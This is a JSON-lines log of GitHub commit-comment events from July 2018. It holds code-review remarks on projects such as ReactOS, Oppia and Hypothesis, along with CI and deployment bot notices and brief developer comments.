{"id":"7973417801","type":"CommitCommentEvent","actor":{"login":"sheetaluk"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":29727661,"position":6,"line":529,"path":"h/views/accounts.py","commit_id":"499e46d7ad4a4a493e6e4e6a1dfff0bfca0d9017","created_at":"2018-07-16T23:00:27Z","updated_at":"2018-07-16T23:00:27Z","author_association":"CONTRIBUTOR","body":"No, we need to leave it in there even if a user doesn't have an email address. `_template_data` is used in the `post` method too, to render the form as in on failure."}},"created_at":"2018-07-16T23:00:27Z"}
{"id":"7973431513","type":"CommitCommentEvent","actor":{"login":"thisisginni"},"repo":{"name":"thisisginni/Dance-letters"},"payload":{"comment":{"id":29727689,"position":null,"line":null,"path":null,"commit_id":"da1e10b9815f28199af837301a7f937ce03bb8c4","created_at":"2018-07-16T23:04:46Z","updated_at":"2018-07-16T23:04:46Z","author_association":"OWNER","body":"https://github.com/thisisginni/Dance-letters/commit/da1e10b9815f28199af837301a7f937ce03bb8c4#diff-6b3c6c4b87815b14f8a65e8bc98e5ef0"}},"created_at":"2018-07-16T23:04:46Z"}
{"id":"7973432714","type":"CommitCommentEvent","actor":{"login":"MrChengs"},"repo":{"name":"MrChengs/mr_chengs"},"payload":{"comment":{"id":29727694,"position":null,"line":null,"path":null,"commit_id":"e264b459255efe2fa11707be9cdcfc362316c46b","created_at":"2018-07-16T23:05:09Z","updated_at":"2018-07-16T23:05:09Z","author_association":"OWNER","body":"###这是一个main我自己平时心血来潮时写的一些x小demo,一方面供自己理解、和以后用，另一方面，也与大家分享，让大家来检阅我的问题"}},"created_at":"2018-07-16T23:05:09Z"}
{"id":"7973435953","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727700,"position":null,"line":null,"path":null,"commit_id":"273e7bbe2906ac6cbfe7681dc4c303368a77d779","created_at":"2018-07-16T23:06:15Z","updated_at":"2018-07-16T23:06:15Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/273e7bbe2906ac6cbfe7681dc4c303368a77d779/.circleci/config.yml)\n"}},"created_at":"2018-07-16T23:06:15Z"}
{"id":"7973439671","type":"CommitCommentEvent","actor":{"login":"bluewavenet"},"repo":{"name":"nodogsplash/nodogsplash"},"payload":{"comment":{"id":29727706,"position":null,"line":null,"path":null,"commit_id":"51e3cf835e7612294585b272936787a391ce8cb9","created_at":"2018-07-16T23:07:31Z","updated_at":"2018-07-16T23:07:31Z","author_association":"MEMBER","body":"Exellent, thanks."}},"created_at":"2018-07-16T23:07:31Z"}
{"id":"7973443779","type":"CommitCommentEvent","actor":{"login":"trindadegm"},"repo":{"name":"trindadegm/chesschart"},"payload":{"comment":{"id":29727713,"position":12,"line":61,"path":"include/CCH/CCH_mechanics.h","commit_id":"03047d00c6ddb97854e3aacadf2a9808ecc680a1","created_at":"2018-07-16T23:08:53Z","updated_at":"2018-07-16T23:08:53Z","author_association":"OWNER","body":"Lots of erros here regarding when I meant WHITE or BLACK."}},"created_at":"2018-07-16T23:08:53Z"}
{"id":"7973446446","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29727715,"position":null,"line":null,"path":null,"commit_id":"decf1f27cfbc82b673d31c94858ab22d567f0907","created_at":"2018-07-16T23:09:50Z","updated_at":"2018-07-16T23:09:50Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/custom-wizard-plugin/73345/168\n"}},"created_at":"2018-07-16T23:09:50Z"}
{"id":"7973449775","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29727720,"position":null,"line":null,"path":null,"commit_id":"76de566ca4d8c8a55397802196d17f2b92ec50de","created_at":"2018-07-16T23:10:53Z","updated_at":"2018-07-16T23:10:53Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/76de566ca4d8c8a55397802196d17f2b92ec50de/index.html"}},"created_at":"2018-07-16T23:10:53Z"}
{"id":"7973450826","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"tronprotocol/TronDeployment"},"payload":{"comment":{"id":29727726,"position":null,"line":null,"path":null,"commit_id":"4dacd80de733bcf667c6651982ec902918e8b7c7","created_at":"2018-07-16T23:11:16Z","updated_at":"2018-07-16T23:11:16Z","author_association":"NONE","body":"4dacd80"}},"created_at":"2018-07-16T23:11:16Z"}
{"id":"7973451210","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727727,"position":null,"line":null,"path":null,"commit_id":"b16cfe79f047b83ee7a95c42a1599577132d78f7","created_at":"2018-07-16T23:11:23Z","updated_at":"2018-07-16T23:11:23Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/273e7bbe2906ac6cbfe7681dc4c303368a77d779/.circleci/config.yml)\n- [scripts/merge_conflicts.sh](https://github.com/pantheon-systems/documentation/commit/b16cfe79f047b83ee7a95c42a1599577132d78f7/scripts/merge_conflicts.sh)\n"}},"created_at":"2018-07-16T23:11:23Z"}
{"id":"7973454197","type":"CommitCommentEvent","actor":{"login":"MacInnes"},"repo":{"name":"MacInnes/sticker_overflow"},"payload":{"comment":{"id":29727728,"position":4,"line":4,"path":"app/views/users/show.html.erb","commit_id":"7feba2246525f3841308460b93ab719ff00ca320","created_at":"2018-07-16T23:12:21Z","updated_at":"2018-07-16T23:12:21Z","author_association":"OWNER","body":"@iandouglas not sure what's causing this issue, but capybara will only recognize the \"Logout\" if it's a link, not a button..."}},"created_at":"2018-07-16T23:12:21Z"}
{"id":"7973455669","type":"CommitCommentEvent","actor":{"login":"vesko2624"},"repo":{"name":"vesko2624/Airport"},"payload":{"comment":{"id":29727730,"position":null,"line":null,"path":null,"commit_id":"41133b2a192c9e3374fd8e0da4fd51b821753866","created_at":"2018-07-16T23:12:48Z","updated_at":"2018-07-16T23:12:48Z","author_association":"OWNER","body":"Opss"}},"created_at":"2018-07-16T23:12:48Z"}
{"id":"7973460776","type":"CommitCommentEvent","actor":{"login":"TangledTessellations"},"repo":{"name":"TangledTessellations/front-end-project-week"},"payload":{"comment":{"id":29727747,"position":null,"line":null,"path":null,"commit_id":"e7a3e80f26204c007c427f88cbcdce1527398cdf","created_at":"2018-07-16T23:14:30Z","updated_at":"2018-07-16T23:14:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Delete an existing note](https://trello.com/c/D1spExUx/9-delete-an-existing-note)"}},"created_at":"2018-07-16T23:14:30Z"}
{"id":"7973460800","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29727748,"position":null,"line":null,"path":null,"commit_id":"c51397b161a41c967d7ac83ef8804fd13f78a0ad","created_at":"2018-07-16T23:14:31Z","updated_at":"2018-07-16T23:14:31Z","author_association":"NONE","body":"123467"}},"created_at":"2018-07-16T23:14:31Z"}
{"id":"7973462040","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29727751,"position":null,"line":null,"path":null,"commit_id":"c51397b161a41c967d7ac83ef8804fd13f78a0ad","created_at":"2018-07-16T23:14:56Z","updated_at":"2018-07-16T23:14:56Z","author_association":"NONE","body":"123 tu 89"}},"created_at":"2018-07-16T23:14:56Z"}
{"id":"7973471986","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29727774,"position":null,"line":null,"path":null,"commit_id":"a90871e3bfb5089e07aaacd1b7275897245d1c3f","created_at":"2018-07-16T23:18:13Z","updated_at":"2018-07-16T23:18:13Z","author_association":"OWNER","body":"Collision 23.30.1~24"}},"created_at":"2018-07-16T23:18:13Z"}
{"id":"7973474820","type":"CommitCommentEvent","actor":{"login":"valib"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29727788,"position":71,"line":248,"path":"src/main/java/net/pms/util/CoverArtArchiveUtil.java","commit_id":"504dc7e3f25d38fe0eac823fe5ba5e03486d074c","created_at":"2018-07-16T23:19:11Z","updated_at":"2018-07-16T23:19:11Z","author_association":"CONTRIBUTOR","body":"@Nadahar what about to add here the `.outputQuality(0.8f)` to decrease the database size as @SubJunk suggested?"}},"created_at":"2018-07-16T23:19:11Z"}
{"id":"7973479303","type":"CommitCommentEvent","actor":{"login":"marcospaulodc"},"repo":{"name":"marcospaulodc/PjtEstudoJava"},"payload":{"comment":{"id":29727801,"position":null,"line":null,"path":null,"commit_id":"8611d38de8c7df8f9120292954237ed050f7dff0","created_at":"2018-07-16T23:20:44Z","updated_at":"2018-07-16T23:20:44Z","author_association":"OWNER","body":"Estudo inicial de Java"}},"created_at":"2018-07-16T23:20:44Z"}
{"id":"7973480192","type":"CommitCommentEvent","actor":{"login":"RichardWLaub"},"repo":{"name":"aidanSoles/ruby-mdl"},"payload":{"comment":{"id":29727806,"position":null,"line":null,"path":null,"commit_id":"907d7e834d99c1cee23495022868a340fb7449e5","created_at":"2018-07-16T23:21:01Z","updated_at":"2018-07-16T23:21:01Z","author_association":"NONE","body":"Snail down bro!"}},"created_at":"2018-07-16T23:21:01Z"}
{"id":"7973483230","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29727815,"position":101,"line":140,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-16T23:22:06Z","updated_at":"2018-07-16T23:22:06Z","author_association":"NONE","body":"This block should be inside lock?"}},"created_at":"2018-07-16T23:22:06Z"}
{"id":"7973485785","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/nbformat-feedstock"},"payload":{"comment":{"id":29727816,"position":null,"line":null,"path":null,"commit_id":"32a11d120241230b2bc90fd1a43bb280f718c907","created_at":"2018-07-16T23:23:00Z","updated_at":"2018-07-16T23:23:00Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mpacer were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T23:23:00Z"}
{"id":"7973488606","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29727818,"position":null,"line":null,"path":null,"commit_id":"837aa0b90bf6dacbc89e633f0e1c791745a29a1c","created_at":"2018-07-16T23:23:58Z","updated_at":"2018-07-16T23:23:58Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-59.9%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-67.14%25-red.png)</a>\n"}},"created_at":"2018-07-16T23:23:58Z"}
{"id":"7973489502","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29727821,"position":105,"line":144,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-16T23:24:15Z","updated_at":"2018-07-16T23:24:15Z","author_association":"NONE","body":"Go ahead and do Completion with message MSG_ACTIVE_PROCESS_LIMIT.\r\nSet status to quota exceeded."}},"created_at":"2018-07-16T23:24:15Z"}
{"id":"7973508592","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29727866,"position":366,"line":353,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-16T23:31:01Z","updated_at":"2018-07-16T23:31:01Z","author_association":"NONE","body":"Previous code commented that holding the process lock and doing a wait on the job lock is bad, which would happen in this code. Was that comment incorrect?"}},"created_at":"2018-07-16T23:31:01Z"}
{"id":"7973509990","type":"CommitCommentEvent","actor":{"login":"redhatrises"},"repo":{"name":"RedHatGov/ato-pathways"},"payload":{"comment":{"id":29727868,"position":1,"line":1,"path":"_data/components/ansible-tower/Makefile","commit_id":"b7b8d70b401b8eb691a125e5e0e62175ce27c7bb","created_at":"2018-07-16T23:31:28Z","updated_at":"2018-07-16T23:31:28Z","author_association":"NONE","body":"@shawndwells why did you add a Makefile to a website?"}},"created_at":"2018-07-16T23:31:28Z"}
{"id":"7973515547","type":"CommitCommentEvent","actor":{"login":"jgmill"},"repo":{"name":"jgmill/dolores"},"payload":{"comment":{"id":29727881,"position":null,"line":null,"path":null,"commit_id":"1314a268fbfe037d85766202bc1a5376cb458ee5","created_at":"2018-07-16T23:33:30Z","updated_at":"2018-07-16T23:33:30Z","author_association":"OWNER","body":"I moved all the data files (gdx, xlsx, tmp) to a new ``model/data`` folder. and consolidated ``MORITS.gms`` with  ``export gdx2xls.gms``"}},"created_at":"2018-07-16T23:33:30Z"}
{"id":"7973515949","type":"CommitCommentEvent","actor":{"login":"RedSparr0w"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29727882,"position":null,"line":null,"path":null,"commit_id":"426f5844f022659de648494e64fd07a063b6ecc1","created_at":"2018-07-16T23:33:39Z","updated_at":"2018-07-16T23:33:39Z","author_association":"NONE","body":"It's coming along nicely, although it might be a good idea to use something similar to [this](https://github.com/gibaBR/Switch-Backup-Manager/blob/master/Switch%20Backup%20Manager/FileData.cs) to hold the data"}},"created_at":"2018-07-16T23:33:39Z"}
{"id":"7973516216","type":"CommitCommentEvent","actor":{"login":"darms"},"repo":{"name":"thetravisw/03-custom-array-list"},"payload":{"comment":{"id":29727883,"position":1,"line":1,"path":".idea/workspace.xml","commit_id":"75bed702ca9b14e02bdb5732c05774ee3d278803","created_at":"2018-07-16T23:33:44Z","updated_at":"2018-07-16T23:33:44Z","author_association":"NONE","body":"Please fix your .gitignore. This file shouldn't be in your repo.\r\nIf you're having issues with this, please come see me."}},"created_at":"2018-07-16T23:33:44Z"}
{"id":"7973518707","type":"CommitCommentEvent","actor":{"login":"darms"},"repo":{"name":"thetravisw/03-custom-array-list"},"payload":{"comment":{"id":29727890,"position":2,"line":2,"path":".idea/misc.xml","commit_id":"75bed702ca9b14e02bdb5732c05774ee3d278803","created_at":"2018-07-16T23:34:38Z","updated_at":"2018-07-16T23:34:38Z","author_association":"NONE","body":"Please take this out of the repo.\r\nIf you're having issues fixing this with your .gitignore, please come see me."}},"created_at":"2018-07-16T23:34:38Z"}
{"id":"7973519068","type":"CommitCommentEvent","actor":{"login":"darms"},"repo":{"name":"thetravisw/03-custom-array-list"},"payload":{"comment":{"id":29727891,"position":1,"line":1,"path":".idea/modules.xml","commit_id":"75bed702ca9b14e02bdb5732c05774ee3d278803","created_at":"2018-07-16T23:34:46Z","updated_at":"2018-07-16T23:34:46Z","author_association":"NONE","body":"Please take this out of the repo.\r\nIf you're having issues fixing this with your .gitignore, please come see me."}},"created_at":"2018-07-16T23:34:46Z"}
{"id":"7973519359","type":"CommitCommentEvent","actor":{"login":"darms"},"repo":{"name":"thetravisw/03-custom-array-list"},"payload":{"comment":{"id":29727892,"position":1,"line":1,"path":".idea/vcs.xml","commit_id":"75bed702ca9b14e02bdb5732c05774ee3d278803","created_at":"2018-07-16T23:34:53Z","updated_at":"2018-07-16T23:34:53Z","author_association":"NONE","body":"Please take this out of the repo.\r\nIf you're having issues fixing this with your .gitignore, please come see me."}},"created_at":"2018-07-16T23:34:53Z"}
{"id":"7973521305","type":"CommitCommentEvent","actor":{"login":"darms"},"repo":{"name":"thetravisw/03-custom-array-list"},"payload":{"comment":{"id":29727895,"position":2,"line":2,"path":"03-custom-array-list.iml","commit_id":"75bed702ca9b14e02bdb5732c05774ee3d278803","created_at":"2018-07-16T23:35:35Z","updated_at":"2018-07-16T23:35:35Z","author_association":"NONE","body":"XML & IML files should not be in the repo.\r\nMoving forward you'll be marked down if these are pushed up."}},"created_at":"2018-07-16T23:35:35Z"}
{"id":"7973521382","type":"CommitCommentEvent","actor":{"login":"r0ggle"},"repo":{"name":"r0ggle/Soft-Stuff"},"payload":{"comment":{"id":29727896,"position":5,"line":14,"path":"html/index.html","commit_id":"cc606108b397cec4c7e762698abf16b0ae1e91cb","created_at":"2018-07-16T23:35:36Z","updated_at":"2018-07-16T23:35:36Z","author_association":"OWNER","body":"was playing around and forgot to remove 'disabled=\"disabled\"', this file should not have been changed"}},"created_at":"2018-07-16T23:35:36Z"}
{"id":"7973522819","type":"CommitCommentEvent","actor":{"login":"retronym"},"repo":{"name":"sbt/sbt-buildinfo"},"payload":{"comment":{"id":29727898,"position":30,"line":61,"path":"src/main/scala/sbtbuildinfo/package.scala","commit_id":"46d7c0938df2eaa45c459240ba6da9b98746125f","created_at":"2018-07-16T23:36:08Z","updated_at":"2018-07-16T23:36:08Z","author_association":"MEMBER","body":"`_root_.scala.Manifest` :)"}},"created_at":"2018-07-16T23:36:08Z"}
{"id":"7973523520","type":"CommitCommentEvent","actor":{"login":"darms"},"repo":{"name":"thetravisw/03-custom-array-list"},"payload":{"comment":{"id":29727900,"position":12,"line":12,"path":"src/lab03_Custom_Array_List.java","commit_id":"75bed702ca9b14e02bdb5732c05774ee3d278803","created_at":"2018-07-16T23:36:24Z","updated_at":"2018-07-16T23:36:24Z","author_association":"NONE","body":"Check the syntax on your declaration and add a return tupe"}},"created_at":"2018-07-16T23:36:24Z"}
{"id":"7973526920","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29727914,"position":null,"line":null,"path":null,"commit_id":"cb2fdecfb6dad341226177114ddc4e6365b7ef30","created_at":"2018-07-16T23:37:38Z","updated_at":"2018-07-16T23:37:38Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#pr-11](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#pr-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-11-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-16T23:37:38Z"}
{"id":"7973531425","type":"CommitCommentEvent","actor":{"login":"kmiloarguello"},"repo":{"name":"kmiloarguello/moto-e4-plus"},"payload":{"comment":{"id":29727922,"position":null,"line":null,"path":null,"commit_id":"63a320f5eaead8002c33ba6d3a0827db7e6d842d","created_at":"2018-07-16T23:39:16Z","updated_at":"2018-07-16T23:39:16Z","author_association":"OWNER","body":"Ready for PR"}},"created_at":"2018-07-16T23:39:16Z"}
{"id":"7973531877","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29727925,"position":null,"line":null,"path":null,"commit_id":"df5db33419e1d850d6b9fce302eb64a9d4aa1df1","created_at":"2018-07-16T23:39:27Z","updated_at":"2018-07-16T23:39:27Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-60](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-60).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-60-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-16T23:39:27Z"}
{"id":"7973532932","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29727930,"position":null,"line":null,"path":null,"commit_id":"cb2fdecfb6dad341226177114ddc4e6365b7ef30","created_at":"2018-07-16T23:39:52Z","updated_at":"2018-07-16T23:39:52Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-62](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-62).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-62-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-16T23:39:52Z"}
{"id":"7973534496","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29727933,"position":935,"line":939,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-16T23:40:25Z","updated_at":"2018-07-16T23:40:25Z","author_association":"NONE","body":"Don't think this can happen as long as the code in PspAssignProcessToJob is correct. You can add an assert to check."}},"created_at":"2018-07-16T23:40:25Z"}
{"id":"7973539364","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29727945,"position":31,"line":733,"path":"ntoskrnl/ps/process.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-16T23:42:15Z","updated_at":"2018-07-16T23:42:15Z","author_association":"NONE","body":"Handle failure case here by removing the process from the job."}},"created_at":"2018-07-16T23:42:15Z"}
{"id":"7973541763","type":"CommitCommentEvent","actor":{"login":"alvieira"},"repo":{"name":"alvieira/website"},"payload":{"comment":{"id":29727951,"position":1,"line":1,"path":"lipsum.txt","commit_id":"f09d09fdbb83f1f72eb2afc7dfbd5ed652179526","created_at":"2018-07-16T23:43:10Z","updated_at":"2018-07-16T23:43:10Z","author_association":"OWNER","body":"### Lipsum really?\r\n\r\nSo we __really__ were not able to find better filler text?"}},"created_at":"2018-07-16T23:43:10Z"}
{"id":"7973542860","type":"CommitCommentEvent","actor":{"login":"CoryHawkless"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":29727952,"position":null,"line":null,"path":null,"commit_id":"ad6ec7f72a7d7326859985a8981b9106259f2d8d","created_at":"2018-07-16T23:43:31Z","updated_at":"2018-07-16T23:43:31Z","author_association":"NONE","body":"Can confirm that after reverting this change and doing a 'composer install' it's now working again.\r\nFor what ever reason the daily update script didn't update the composer dependencies. It could have been a permissions issue as alluded to by @murrant "}},"created_at":"2018-07-16T23:43:31Z"}
{"id":"7973546538","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"oppia/oppia"},"payload":{"comment":{"id":29727966,"position":18,"line":43,"path":"core/controllers/feedback.py","commit_id":"6bf178b3e8a28fe03a615d4aa99217f049fcec1c","created_at":"2018-07-16T23:44:53Z","updated_at":"2018-07-16T23:44:53Z","author_association":"MEMBER","body":"This is confusing. Why call the keys \"threads\" and \"suggestion threads\"? I would expect some combination of \"all threads\", \"suggestion threads\" and \"feedback threads\" -- unless the last concept is deprecated?"}},"created_at":"2018-07-16T23:44:53Z"}
{"id":"7973549401","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29727973,"position":null,"line":null,"path":null,"commit_id":"f4c902b434d093d619a0a1aede87a663336142f2","created_at":"2018-07-16T23:45:54Z","updated_at":"2018-07-16T23:45:54Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/importing-or-creating-a-theme-causes-a-500-error/92486/4\n"}},"created_at":"2018-07-16T23:45:54Z"}
{"id":"7973549765","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"oppia/oppia"},"payload":{"comment":{"id":29727975,"position":2,"line":70,"path":"core/templates/dev/head/pages/exploration_editor/feedback_tab/ThreadDataService.js","commit_id":"6bf178b3e8a28fe03a615d4aa99217f049fcec1c","created_at":"2018-07-16T23:46:01Z","updated_at":"2018-07-16T23:46:01Z","author_association":"MEMBER","body":"An fPromise returning data.suggestion_threads seems confusing.\r\n\r\nCan you explain why you didn't combine into a single backend call?"}},"created_at":"2018-07-16T23:46:01Z"}
{"id":"7973550019","type":"CommitCommentEvent","actor":{"login":"captbaritone"},"repo":{"name":"captbaritone/webamp"},"payload":{"comment":{"id":29727977,"position":null,"line":null,"path":null,"commit_id":"5bc76254bc8cc2139a138a4f0bd65ac1ff220f3d","created_at":"2018-07-16T23:46:07Z","updated_at":"2018-07-16T23:46:07Z","author_association":"OWNER","body":"😍 "}},"created_at":"2018-07-16T23:46:07Z"}
{"id":"7973552512","type":"CommitCommentEvent","actor":{"login":"ovasclub"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":29727983,"position":null,"line":null,"path":null,"commit_id":"584009f07471af82a9e6a6d970349992d97897d3","created_at":"2018-07-16T23:47:03Z","updated_at":"2018-07-16T23:47:03Z","author_association":"NONE","body":"Changed size in infusions/gallery/templates/gallery.php 80\r\nheight: 120px;\r\nmax-height: 120px;  to\r\nheight: 220px;\r\nmax-height: 220px;\r\nNow the preview is displayed correctly"}},"created_at":"2018-07-16T23:47:03Z"}
{"id":"7973553354","type":"CommitCommentEvent","actor":{"login":"MikePopoloski"},"repo":{"name":"MikePopoloski/SharpBgfx"},"payload":{"comment":{"id":29727986,"position":null,"line":null,"path":null,"commit_id":"8173737855b9dc87bdd0c06013eaf06d6fbefb5b","created_at":"2018-07-16T23:47:21Z","updated_at":"2018-07-16T23:47:21Z","author_association":"OWNER","body":"Thanks, good catch."}},"created_at":"2018-07-16T23:47:21Z"}
{"id":"7973554869","type":"CommitCommentEvent","actor":{"login":"SpicyKitten"},"repo":{"name":"SpicyKitten/tamerproject"},"payload":{"comment":{"id":29727990,"position":null,"line":null,"path":null,"commit_id":"1bb1f0c07c27770aa70264320b9476cb1b5be1e4","created_at":"2018-07-16T23:47:54Z","updated_at":"2018-07-16T23:47:54Z","author_association":"OWNER","body":"Goodbye reflection, hello world!"}},"created_at":"2018-07-16T23:47:54Z"}
{"id":"7973557318","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29727995,"position":71,"line":248,"path":"src/main/java/net/pms/util/CoverArtArchiveUtil.java","commit_id":"504dc7e3f25d38fe0eac823fe5ba5e03486d074c","created_at":"2018-07-16T23:48:48Z","updated_at":"2018-07-16T23:48:48Z","author_association":"CONTRIBUTOR","body":"@valib It would be a suitable location, but I don't think it's needed for these. This is where the one that is used for all audio files with the same MBID's is created. It would be more useful on \"normal\" thumbnails (those that aren't from CoverArtArchive). In any case, an implementation for handling that would be needed, so a new parameter for `toThumbnail()`/`ImagesUtil.transcode()` would have to be implemented first. This parameter should probably also make sure that PNG's are converted to JPEG if set."}},"created_at":"2018-07-16T23:48:48Z"}
{"id":"7973557338","type":"CommitCommentEvent","actor":{"login":"The1Freeman"},"repo":{"name":"captbaritone/webamp"},"payload":{"comment":{"id":29727996,"position":null,"line":null,"path":null,"commit_id":"5bc76254bc8cc2139a138a4f0bd65ac1ff220f3d","created_at":"2018-07-16T23:48:49Z","updated_at":"2018-07-16T23:48:49Z","author_association":"NONE","body":"This is 🔥 🔥 🔥 🔥 "}},"created_at":"2018-07-16T23:48:49Z"}
{"id":"7973558716","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29728002,"position":55,"line":85,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-16T23:49:21Z","updated_at":"2018-07-16T23:49:21Z","author_association":"NONE","body":"Should this be inside the job lock?"}},"created_at":"2018-07-16T23:49:21Z"}
{"id":"7973560109","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29728007,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-16T23:49:53Z","updated_at":"2018-07-16T23:49:53Z","author_association":"NONE","body":"> I've hardcoded two cells with date of birthdate\r\n\r\nThere's your issue. The error you're seeing in pack man is telling you that each column name must be unique, and you have two columns called Birthdate (also, the red font is quite hard to read). Try dropping one of them and adding a migration. :)"}},"created_at":"2018-07-16T23:49:53Z"}
